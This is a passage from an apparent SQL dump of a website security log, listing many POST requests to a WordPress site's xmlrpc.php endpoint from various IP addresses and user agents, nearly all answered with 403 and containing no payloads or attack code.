Firefox\\/61.0\"}','m7dPa2jf43B5OYnEbkgTSXhD',0,1681687238.7913,400,'','POST',404,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','7SQVzt2RH0bwiBe5xEpy8MPJ',0,1681687412.7248,784,'','POST',403,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','kNouz2ZWMXC4wASepKbUv9Is',0,1681687413.5167,661,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','NXP3C2jrqe0AKTFvnw5shoVb',0,1681687415.6638,603,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','cMIok6p9uQNmx7riASnzwaPh',0,1681687423.8156,859,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','DtsZfkzNGU41HBY0CTm958ro',0,1681687424.4567,744,'','POST',403,0,515,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','DEUKMbxiTmu3heGICLB2j5Rq',0,1681687430.9685,565,'','POST',403,0,515,0,1,'',0),('138.186.9.114',2327447922,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','XAGmQkDuHVUY7PhsnLTyzKiR',0,1681687434.3089,604,'','POST',403,0,515,0,1,'',0),('45.150.149.86',764843350,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','5D2MOvhqnHVYtTb4SJfCNB6A',0,1681687436.0899,576,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','puKxLSnlTJMAFzB1X8jamQWy',0,1681687437.8244,653,'','POST',403,0,515,0,1,'',0),('92.205.2.176',1556939440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','qpUZ9FbDCcJEPwNdIGk35aBm',0,1681687439.2538,952,'','POST',403,0,515,0,1,'',0),('198.23.58.160',3323411104,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','omWCyGs29jEhcviNrkQ8BnP5',0,1681687445.6818,629,'','POST',403,0,515,0,1,'',0),('87.101.92.171',1466260651,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','C7RSIx4dgjneaGPyZFrlB02c',0,1681689146.8204,3581,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','d1HN4BMSZ58q6DisbKRg0c9W',0,1681692130.8013,887,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','qFvVBK9A0PfgpISOZ4HNjxRC',0,1681692131.4517,764,'','POST',403,0,515,0,1,'',0),('77.220.104.89',1306290265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','39MGYe4o6mwdZT8iyIHzncP1',0,1681692136.3603,1279,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','jW6OPJf7dlonbrcRUA05qILk',0,1681692136.7663,1144,'','POST',403,0,515,0,1,'',0),('72.167.57.16',1218918672,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','8wL6xak5OnPKjRlITmGsY1yV',0,1681692145.9716,662,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','AFjDhtpUK5WXe4YRsSG8fmMb',0,1681692149.9492,578,'','POST',403,0,515,0,1,'',0),('185.25.23.45',3105429293,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','y6lhNb30vPeH4ZULd7FiXQgx',0,1681692156.1677,581,'','POST',403,0,515,0,1,'',0),('103.171.90.148',1739283092,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','0ibAmhUGgojx7pJV3XI6HWnu',0,1681692166.9897,572,'','POST',403,0,515,0,1,'',0),('46.38.249.174',774306222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','uX5rkDqplSwmiW7O0oYMnQG8',0,1681692176.2534,687,'','POST',403,0,515,0,1,'',0),('139.59.125.187',2335931835,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','GsLwMahiQZXSzndV0BImW4bO',0,1681692180.2677,595,'','POST',403,0,515,0,1,'',0),('192.64.117.65',3225449793,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','xEfuaH4LQsZz3thJnkRe5oT7',0,1681692189.5572,651,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','uxZe40aC7hbRwO2YG31mlTtd',0,1681692197.2571,692,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','cf7Ryhm8KdxH5DFMvzil1gaA',0,1681692199.8771,592,'','POST',403,0,515,0,1,'',0),('139.59.104.143',2335926415,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','MhoPieEKdRWBCbHNkctIa4lD',0,1681692213.0323,627,'','POST',403,0,515,0,1,'',0),('82.223.115.237',1390375917,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','zJDIPuRt5AgfT1068Ojie9bY',0,1681692218.4475,646,'','POST',403,0,515,0,1,'',0),('165.22.211.204',2769736652,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','sQt2F1pbMdxJ5cjfBhnXzy9a',0,1681696130.7946,579,'','POST',403,0,515,0,1,'',0),('101.50.2.67',1697776195,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','490ge8RBNQoUnY1vibsmyaAV',0,1681696134.8898,601,'','POST',403,0,515,0,1,'',0),('85.10.148.169',1426756777,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','VUEQ9aWXocF5frvmJnwHk42N',0,1681696140.9001,584,'','POST',403,0,515,0,1,'',0),('89.107.60.10',1500199946,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','x1oVy0O3MUKNmXzrZAP5qefp',0,1681696143.6676,575,'','POST',403,0,515,0,1,'',0),('68.178.228.199',1152574663,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','TZqD8iy4OovhxwUerVc3p1St',0,1681696149.4987,945,'','POST',403,0,515,0,1,'',0),('176.31.124.90',2954853466,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','x84dW1VB2C735jEFUtZX0arw',0,1681696150.2593,1413,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','9ZCmM6a2Bq5sE0lx3ykwnApY',0,1681696150.5409,1250,'','POST',403,0,515,0,1,'',0),('204.93.196.26',3428697114,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','jXudz9afkADGmbQy7WxZ2hMq',0,1681696157.5833,602,'','POST',403,0,515,0,1,'',0),('50.62.137.47',842959151,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','vuRUcTdSxt1QAhfY3HCpbMNB',0,1681696163.9230,556,'','POST',403,0,515,0,1,'',0),('35.214.190.212',601276116,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','xS0f9d6h7K8lYuLvGqUmXp45',0,1681696908.6630,678,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','BjWG6zK0Smy3JPVt4Tr7oEqd',0,1681696912.3811,621,'','POST',403,0,515,0,1,'',0),('160.153.153.159',2694420895,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','mOwEJ84juMfoFKeZBUI92dlr',0,1681696916.3004,593,'','POST',403,0,515,0,1,'',0),('62.151.182.173',1050130093,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','qgEb5prD1RWVHTZhA3mjBwo2',0,1681696925.1692,577,'','POST',403,0,515,0,1,'',0),('137.184.59.110',2310552430,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','kslI0eTLucYd2WNGyf3qatwb',0,1681696926.7944,630,'','POST',403,0,515,0,1,'',0),('195.154.107.17',3281677073,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','oDxPv9T53OwHS0qtMmyVRikr',0,1681696933.9083,2348,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','CS5ENX3RbuVdgGx1WlrsDY4o',0,1681696933.2676,3000,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','c1QjynMWLSiPguhrk04I2YEq',0,1681696935.7165,806,'','POST',403,0,515,0,1,'',0),('46.38.249.174',774306222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','5E2jlMvioIPQWAsHSJkfKute',0,1681696943.5651,1176,'','POST',403,0,515,0,1,'',0),('213.152.162.69',3583550021,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tx7KM1qi4PBbUJVo5FShGjkl',0,1681698390.7631,1450,'','POST',403,0,515,0,1,'',0),('213.152.187.215',3583556567,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','djrMAS0DIzQoBGkvLaJy2FNn',0,1681698564.4330,570,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','7d3hSG6qHvmBMDjQ4Rx0UpFz',0,1681700443.2273,3126,'','POST',403,0,515,0,1,'',0),('104.236.7.86',1760298838,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','Dm4uE9GV5yTQYjkLBoO6FS2Z',0,1681700446.5000,577,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','paDHzJETMBR4c12Y75ywndhr',0,1681700449.9871,637,'','POST',403,0,515,0,1,'',0),('176.119.210.163',2960642723,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','ax3XulNcCOkIi8yvL4oHjFJM',0,1681700452.0168,630,'','POST',403,0,515,0,1,'',0),('46.38.249.174',774306222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','H2obnyzFG5UhQLNCjuBETqka',0,1681700470.3454,2716,'','POST',403,0,515,0,1,'',0),('185.110.66.2',3111010818,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','UrCkagxlEKNhR4sqFHb2c7P9',0,1681700480.4121,927,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','Wyn4lpxorb3dtXYT581UkAjV',0,1681700487.6631,1825,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','6d8PyelofJtKjVH97RrDZYam',0,1681700487.6661,1895,'','POST',403,0,515,0,1,'',0),('46.242.233.126',787671422,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','Gxtm3j8zE7kn4hgCBUOHK61L',0,1681701053.6439,4113,'','POST',403,0,515,0,1,'',0),('185.30.32.174',3105759406,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','V12TbnCiZfSPI5sEkxoJDwlK',0,1681701060.8997,709,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','OrSbRgTDuzeELnkhc0P17d6I',0,1681701063.8088,1123,'','POST',403,0,515,0,1,'',0),('202.172.28.70',3400277062,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','3Dlof6tA7WYmSU9h8TBuyQZ1',0,1681701072.2782,933,'','POST',403,0,515,0,1,'',0),('139.59.25.27',2335906075,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','A5GRKN93yrUFHl7Pa8vSiVLC',0,1681701074.3073,1129,'','POST',403,0,515,0,1,'',0),('101.32.41.71',1696606535,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','oZKIHBO5qGJkS8TQRnhtwfWC',0,1681701075.1511,819,'','POST',403,0,515,0,1,'',0),('54.37.121.239',908425711,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','eZuyhoMtUHpmOiSP5nI6g1r4',0,1681701085.2378,2789,'','POST',403,0,515,0,1,'',0),('103.117.180.72',1735767112,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','1EUmt9Sf5kQGlvKIecW2sH8L',0,1681701092.0433,1498,'','POST',403,0,515,0,1,'',0),('198.54.120.17',3325458449,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','1KBMrIjOLQ3Da6Scg7pPmTeH',0,1681701092.4793,1574,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','aWRHrIFAent79MK8xd3XDvkS',0,1681701093.5766,1080,'','POST',403,0,515,0,1,'',0),('162.0.232.58',2717968442,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','RLNf71WESk3HbzmwnrG6J0M8',0,1681701099.7148,814,'','POST',403,0,515,0,1,'',0),('59.106.222.53',996859445,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','ozs32HOXKypWmcjUf4hAGDSN',0,1681701103.5185,744,'','POST',403,0,515,0,1,'',0),('185.156.174.115',3114053235,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZdTnNSeUzplskYWqbJ35XO4D',0,1681701182.1878,2768,'','POST',403,0,515,0,1,'',0),('178.238.229.54',3002000694,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KBVYtxuLAw23fkzTUSaHMnlq',0,1681703527.8265,3686,'','POST',403,0,515,0,1,'',0),('40.64.56.120',675297400,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','GCPzgvkRZHhuKVpbNTD2Ji5A',0,1681705031.0350,552,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','BzReKUjf21D7qa0TJSkLogWZ',0,1681705041.4007,547,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','uUc15qkDWHV9CXi62M0bAyYe',0,1681705166.9502,572,'','POST',403,0,515,0,1,'',0),('5.134.4.248',92669176,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','c6pXI2GFmUrBwhoDTNPxSHnq',0,1681705167.7657,1112,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','TqJPty69UOs0IzVbmCcjH8RQ',0,1681705168.1744,1027,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','tdGW8i9b7uhrNcZ5neKp3UYO',0,1681705171.9768,594,'','POST',403,0,515,0,1,'',0),('149.127.214.172',2508183212,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','b5q3vzsOc9DN4gpXlrjJUS2k',0,1681705178.4570,568,'','POST',403,0,515,0,1,'',0),('146.59.33.210',2453348818,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','bXRlZhydMjefzr6nItqO8Lp3',0,1681705182.8043,583,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','mU6SQRyVudGzO1cpDNei5PMh',0,1681705186.9016,599,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','kNZPi1MD7UcXojzVnqwt4h9B',0,1681705189.9890,1590,'','POST',403,0,515,0,1,'',0),('198.71.235.55',3326602039,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','8a5uUW0JjHp7VSiOI2ZrEbn3',0,1681705191.3484,773,'','POST',403,0,515,0,1,'',0),('41.111.172.42',695184426,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','GXSyo62m5idHpxrsOP7QT8WC',0,1681705197.9586,587,'','POST',403,0,515,0,1,'',0),('92.205.53.115',1556952435,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 